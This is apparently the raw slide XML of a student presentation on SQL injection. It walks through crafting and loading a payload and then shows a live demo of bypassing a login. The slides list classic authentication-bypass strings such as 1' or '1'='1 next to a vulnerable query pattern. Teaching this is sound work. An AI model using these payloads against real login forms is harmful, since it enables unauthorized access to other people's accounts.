                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>                         3. Out-of -band SQL Injection</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1379" name="Google Shape;1379;p203"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="68601" y="260025"/>
            <a:ext cx="6990600" cy="7971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2720" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>STEP 2:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2720" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2720" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>CREATING THE MALICIOUS INPUT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2720">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2720">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2720"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1380" name="Google Shape;1380;p203"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6894258" y="3775657"/>
            <a:ext cx="2249743" cy="1367843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1381" name="Google Shape;1381;p203"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497198" y="-13996"/>
            <a:ext cx="1646801" cy="335322"/>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204"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929188" y="214313"/>
            <a:ext cx="1543200" cy="2055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173</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1387" name="Google Shape;1387;p204"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1871700" y="792131"/>
            <a:ext cx="7020600" cy="4225200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="254000" marR="0" lvl="0" indent="-247650" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>The payload which we created need to load in the user input field. It can any one of the input three fields once we had submit the payload, we need to observe the website response. </a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="254000" marR="0" lvl="0" indent="-152400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="254000" marR="0" lvl="0" indent="-247650" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Sometime it shows the Database error like “Database Invalid query” or “invalid username” according to the response displayed, we need to perform the modification and continue our work of injecting the payload in the user field .</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="254000" marR="0" lvl="0" indent="-152400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="254000" marR="0" lvl="0" indent="-247650" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>E.g for blind SQL injection    </a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="254000" marR="0" lvl="0" indent="-247650" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Select * from table where user=” ”+input+and password=” “;</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="254000" marR="0" lvl="0" indent="-152400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="254000" marR="0" lvl="0" indent="-247650" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="∙"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1’ or ‘1’=’1</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="254000" marR="0" lvl="0" indent="-247650" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="∙"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1’ or ‘1’=’1’</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="254000" marR="0" lvl="0" indent="-247650" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="∙"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1” or “1”=”1</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="254000" marR="0" lvl="0" indent="-247650" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="∙"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1” or “1”=”1” – -</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="254000" marR="0" lvl="0" indent="-247650" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="∙"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1” or “1”=”1” #</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1388" name="Google Shape;1388;p204"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349248" y="70200"/>
            <a:ext cx="6714900" cy="9768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3000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>STEP 3: LOADING THE PAYLOAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1800" b="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1389" name="Google Shape;1389;p204"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-2730446">
            <a:off x="-211267" y="2423981"/>
            <a:ext cx="2036516" cy="1238202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1390" name="Google Shape;1390;p204"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497198" y="-13996"/>
            <a:ext cx="1646801" cy="335322"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1395" name="Google Shape;1395;p205"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6894258" y="3775657"/>
            <a:ext cx="2249743" cy="1367843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1396" name="Google Shape;1396;p205"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="371199" y="959037"/>
            <a:ext cx="6846601" cy="3225428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1397" name="Google Shape;1397;p205"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143497" y="12525"/>
            <a:ext cx="7074300" cy="10416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en" sz="2600" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>CONCEPTUAL BLOCK DIAGRAM OF THE SQL INJECTION</a:t>
            </a:r>
            <a:endParaRPr sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1398" name="Google Shape;1398;p205"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497198" y="-13996"/>
            <a:ext cx="1646801" cy="335322"/>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206"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836075" y="195275"/>
            <a:ext cx="6984900" cy="46446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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="6000"/>
              <a:t>LIVE IMPLEMENTATION</a:t>
            </a:r>
            <a:endParaRPr sz="6000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1404" name="Google Shape;1404;p206"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929188" y="214313"/>
            <a:ext cx="1543200" cy="2055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175</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1405" name="Google Shape;1405;p206"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6894258" y="3775657"/>
            <a:ext cx="2249743" cy="1367843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1406" name="Google Shape;1406;p206"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497198" y="-13996"/>
            <a:ext cx="1646801" cy="335322"/>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108" y="1598916"/>
            <a:ext cx="5897366" cy="3544584"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544530" y="750013"/>
            <a:ext cx="8194872" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ere username is hacker and password is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> , now first we will see normal login with right password </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then with different password we will perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> injection attack to get into the same user account</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229317038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25" y="924674"/>
            <a:ext cx="8239873" cy="4083690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581595" y="359596"/>
            <a:ext cx="7693132" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See here at the mark we are inside the hacker account with right username and right password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4978296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531" y="1150704"/>
            <a:ext cx="8352890" cy="3879779"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575353" y="359596"/>
            <a:ext cx="5189241" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>After using wrong password it is displaying authentication error</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14187091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160" y="1626479"/>
            <a:ext cx="8455632" cy="3517021"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345419" y="472611"/>
            <a:ext cx="8751114" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Here we used wrong password as ‘ only , as you can see how the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> command runs to authenticate user </a:t>
            </a:r>
